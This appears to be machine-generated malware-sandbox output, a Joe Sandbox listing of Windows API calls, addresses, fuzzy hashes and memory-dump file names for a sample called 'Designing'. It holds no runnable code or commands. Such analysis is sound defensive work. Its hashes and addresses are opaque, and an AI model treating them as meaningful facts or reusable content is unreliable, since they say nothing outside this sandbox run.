                                                                                                                                                                              • Instruction ID: 7fc886dd71996dca41c18f2b2efb22fb63cff7f8031d710a98cb934de3a29bc6
                                                                                                                                                                              • Opcode Fuzzy Hash: c1a108227261cfca14861ca3fec443b586ba4428ab3560a1bfd15a617aabdd43
                                                                                                                                                                              • Instruction Fuzzy Hash: 43E01AB0C04208DFCB419FB1EC4DA5DBFB1EB08310B108809E85AF3250C7389905DF10
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                              • String ID: @COM_EVENTOBJ$bn
                                                                                                                                                                              • API String ID: 2948472770-192135924
                                                                                                                                                                              • Opcode ID: 4ec27ab8fbdb283d5dac001edb81a7cfa8585107ab1897d0b7da84b4ee1600fc
                                                                                                                                                                              • Instruction ID: 4a2ea12aa67fe9d36b223d7ab1bf5a7e0e6343bed94dc1a63732ff4abab29dca
                                                                                                                                                                              • Opcode Fuzzy Hash: 4ec27ab8fbdb283d5dac001edb81a7cfa8585107ab1897d0b7da84b4ee1600fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 14F1AF70A08305DFD724DF14C841B6AB7E0FF84704F1A891DF68AA7261D775EA45CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DC05B2: EnterCriticalSection.KERNEL32(00E7170C,?,00000000,?,00DAD22A,00E73570,00000001,00000000,?,?,00E1F023,?,?,00000000,00000001,?), ref: 00DC05BD
                                                                                                                                                                                • Part of subcall function 00DC05B2: LeaveCriticalSection.KERNEL32(00E7170C,?,00DAD22A,00E73570,00000001,00000000,?,?,00E1F023,?,?,00000000,00000001,?,00000001,00E72430), ref: 00DC05FA
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00DC0413: __onexit.LIBCMT ref: 00DC0419
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00E28658
                                                                                                                                                                                • Part of subcall function 00DC0568: EnterCriticalSection.KERNEL32(00E7170C,00000000,?,00DAD258,00E73570,00DE27C9,00000001,00000000,?,?,00E1F023,?,?,00000000,00000001,?), ref: 00DC0572
                                                                                                                                                                                • Part of subcall function 00DC0568: LeaveCriticalSection.KERNEL32(00E7170C,?,00DAD258,00E73570,00DE27C9,00000001,00000000,?,?,00E1F023,?,?,00000000,00000001,?,00000001), ref: 00DC05A5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                              • String ID: Variable must be of type 'Object'.$bn
                                                                                                                                                                              • API String ID: 535116098-2837176596
                                                                                                                                                                              • Opcode ID: 8d08c1370338c9e3690c1e172636fd2186d4a64deccbb12499111adaa08987b8
                                                                                                                                                                              • Instruction ID: 3e2bac3dd727695d21415c2764a8f528957b138f9ff882e33d0e25dff9861229
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d08c1370338c9e3690c1e172636fd2186d4a64deccbb12499111adaa08987b8
                                                                                                                                                                              • Instruction Fuzzy Hash: 45918174A01218EFCB04EF94E991DADBBB1FF44304F54905AF906BB292DB71AE41CB61
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
                                                                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E15919
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Connection_wcslen
                                                                                                                                                                              • String ID: *$LPT
                                                                                                                                                                              • API String ID: 1725874428-3443410124
                                                                                                                                                                              • Opcode ID: 656bd41cb95cff379ecdd7b756466bb2df71a55b5a8135ffc5dc86241623a9b5
                                                                                                                                                                              • Instruction ID: 49dd52273d734f974ec5b7fce08ddb1083ddbcc50f3e0036a19acb5d997dae7c
                                                                                                                                                                              • Opcode Fuzzy Hash: 656bd41cb95cff379ecdd7b756466bb2df71a55b5a8135ffc5dc86241623a9b5
                                                                                                                                                                              • Instruction Fuzzy Hash: 20917E76900604DFCB14CF54C484EA9BBF1EF85318F189099E8596F352C771EE85CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00E058AF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ContainedObject
                                                                                                                                                                              • String ID: 0$$Container
                                                                                                                                                                              • API String ID: 3565006973-836522788
                                                                                                                                                                              • Opcode ID: 740b103367afc1165ed03e5f4b02c0351913abeda7a27b11c257034b54266a5c
                                                                                                                                                                              • Instruction ID: 2ea7448c2711b234c7844c79dbad312ad7f9f787e476542ba50853506727ba21
                                                                                                                                                                              • Opcode Fuzzy Hash: 740b103367afc1165ed03e5f4b02c0351913abeda7a27b11c257034b54266a5c
                                                                                                                                                                              • Instruction Fuzzy Hash: BD813871200701EFDB14DF54C885A6ABBF5FF48714F14856EF95AAB291DB70A881CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00DCE67D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                              • String ID: pow
                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                              • Opcode ID: ec799bfaaea58a13a25a3888ff836975bb7442bcb07caf524823f63e212ad56e
                                                                                                                                                                              • Instruction ID: 9612dfde7f7b575714f273e534260507a7a5718c63b57d43081c3cf9dab5fd93
                                                                                                                                                                              • Opcode Fuzzy Hash: ec799bfaaea58a13a25a3888ff836975bb7442bcb07caf524823f63e212ad56e
                                                                                                                                                                              • Instruction Fuzzy Hash: 80515AA1E592038AC713B714CD01B6A6BA4EB50700F384D5EF0D5433E9EF358D8EAA76
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: #
                                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                                              • Opcode ID: 73d2af4de40ded1b346cdef294c3774a58b8db89166c42c4fbee4e80a386d9d4
                                                                                                                                                                              • Instruction ID: 58c7aeead8deb6d6e98cdf25693bd78e6be962f58489972d39fb1c80de8a0249
                                                                                                                                                                              • Opcode Fuzzy Hash: 73d2af4de40ded1b346cdef294c3774a58b8db89166c42c4fbee4e80a386d9d4
                                                                                                                                                                              • Instruction Fuzzy Hash: 3951063190424ADFCF25DF28D441AFA7BA1EF15310F698059E9929B2D0DB34DD42DB72
                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00DBF6DB
                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00DBF6F4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                                                              • Opcode ID: 94797ff7152052ac1f5999e8f5efe56f3147e4c6ed1b9f269853966cd088329b
                                                                                                                                                                              • Instruction ID: cc3df429b7be587dc6d33322c7f88e14bc898c69b22f46ab5ba2daacaa6334b7
                                                                                                                                                                              • Opcode Fuzzy Hash: 94797ff7152052ac1f5999e8f5efe56f3147e4c6ed1b9f269853966cd088329b
                                                                                                                                                                              • Instruction Fuzzy Hash: 2D5138719087489FD320AF11DC86BABBBF8FB95300F814C5DF6D9521A1DB708529CB66
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00E340BD
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E340F8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                                                                              • String ID: static
                                                                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                                                                              • Opcode ID: 99570369701b35be7450905121dabc70cfd9276b74e057cb285e1aad83b315cb
                                                                                                                                                                              • Instruction ID: dea6d89887bf97cc05d26dceca9cd7f8c2bc5bf99ff51a83d54a80b565d0f271
                                                                                                                                                                              • Opcode Fuzzy Hash: 99570369701b35be7450905121dabc70cfd9276b74e057cb285e1aad83b315cb
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B31A1B1210604AEDB14DF74CC84FFB7BA9FF48724F009619F9A5A7190DA71AC81DB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00E350BD
                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E350D2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: '
                                                                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                                                                              • Opcode ID: f5c208da29afbb624ad584f31a8f5e4340c90ba7ee98bd928381d2bd20ff0462
                                                                                                                                                                              • Instruction ID: b3e0f8639d1dcf68386eb5c0c46808bea5762d9398d5370368fcc55275d51905
                                                                                                                                                                              • Opcode Fuzzy Hash: f5c208da29afbb624ad584f31a8f5e4340c90ba7ee98bd928381d2bd20ff0462
                                                                                                                                                                              • Instruction Fuzzy Hash: B6315B75A0070A9FDB18CF69C884BEE7BB5FF49304F20506AE904AB391D772A945CF90
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                                • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
                                                                                                                                                                              • GetParent.USER32(?), ref: 00DE3440
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 00DE34CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$ParentProc
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2181805148-2063206799
                                                                                                                                                                              • Opcode ID: ec7e1c2d6ac37d85036b375f195817eb3c5fa0ad235afd726a344530846b838b
                                                                                                                                                                              • Instruction ID: 0473345421cc5fec0490e853736e9302c896a365a5e197a48bf32877efff389d
                                                                                                                                                                              • Opcode Fuzzy Hash: ec7e1c2d6ac37d85036b375f195817eb3c5fa0ad235afd726a344530846b838b
                                                                                                                                                                              • Instruction Fuzzy Hash: 13218231601284AFCB26AF6ECC4E9B53B66EF46360F584258F7295B2E2C3319E55D730
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA78B1
                                                                                                                                                                                • Part of subcall function 00DA7873: GetStockObject.GDI32(00000011), ref: 00DA78C5
                                                                                                                                                                                • Part of subcall function 00DA7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA78CF
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E34216
                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 00E34230
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                              • String ID: static
                                                                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                                                                              • Opcode ID: 4a0b68aeb16ecadf8285f657baabc87aba8f4909fe1bfc7b4f4babffc67a4139
                                                                                                                                                                              • Instruction ID: f34519aa8960ed6d7a0be6e32268b8e4370803b91b5bd6d82b66b0b4803d72cd
                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b68aeb16ecadf8285f657baabc87aba8f4909fe1bfc7b4f4babffc67a4139
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E1126B261020AAFDB01DFA8DC4AAFA7BE8EB08318F015514F955E3250D635E851DB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E1D7C2
                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E1D7EB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                                                                              • String ID: <local>
                                                                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                                                                              • Opcode ID: 33e116739b6eba37387e55f741885babd1db92798b9396058181a85f6e1139aa
                                                                                                                                                                              • Instruction ID: be4a2d9e45981bd783bf0f960a3d8a3d684066361562b5cfe60764f5f1f95974
                                                                                                                                                                              • Opcode Fuzzy Hash: 33e116739b6eba37387e55f741885babd1db92798b9396058181a85f6e1139aa
                                                                                                                                                                              • Instruction Fuzzy Hash: 71112571209232BED7384B629C49EF7BE9CEB127A8F00522BF509A30C0D27088C4C2F0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,?), ref: 00E0761D
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E07629
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                              • String ID: STOP
                                                                                                                                                                              • API String ID: 1256254125-2411985666
                                                                                                                                                                              • Opcode ID: 7973edae31c15d4ae7be68d116845fe2b3d2732fdc452e7b85278f8ef672f4ee
                                                                                                                                                                              • Instruction ID: 288baf4af7dec4a3ce14bbf408f84662e1bc921aa54827a9bc2a68652ffda71a
                                                                                                                                                                              • Opcode Fuzzy Hash: 7973edae31c15d4ae7be68d116845fe2b3d2732fdc452e7b85278f8ef672f4ee
                                                                                                                                                                              • Instruction Fuzzy Hash: 0B010432E18A278BCB109EBDEC509BF37B5BB61354B001524E4A3B31D1EB32E880C260
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E02699
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                              • Opcode ID: eda36be380aed3d287f3d5d8094c18f334dfff9e35baaa4b4cd7801bc1da23ce
                                                                                                                                                                              • Instruction ID: f912dc63f8eeae66fa14df729cb38d2cbd3b0608a23255fde0415eeec6a5ee9a
                                                                                                                                                                              • Opcode Fuzzy Hash: eda36be380aed3d287f3d5d8094c18f334dfff9e35baaa4b4cd7801bc1da23ce
                                                                                                                                                                              • Instruction Fuzzy Hash: DD01B575640214ABCF04AB64DC59DFE77B4EF56360B00161AE533B72C2DA3258498661
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E02593
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
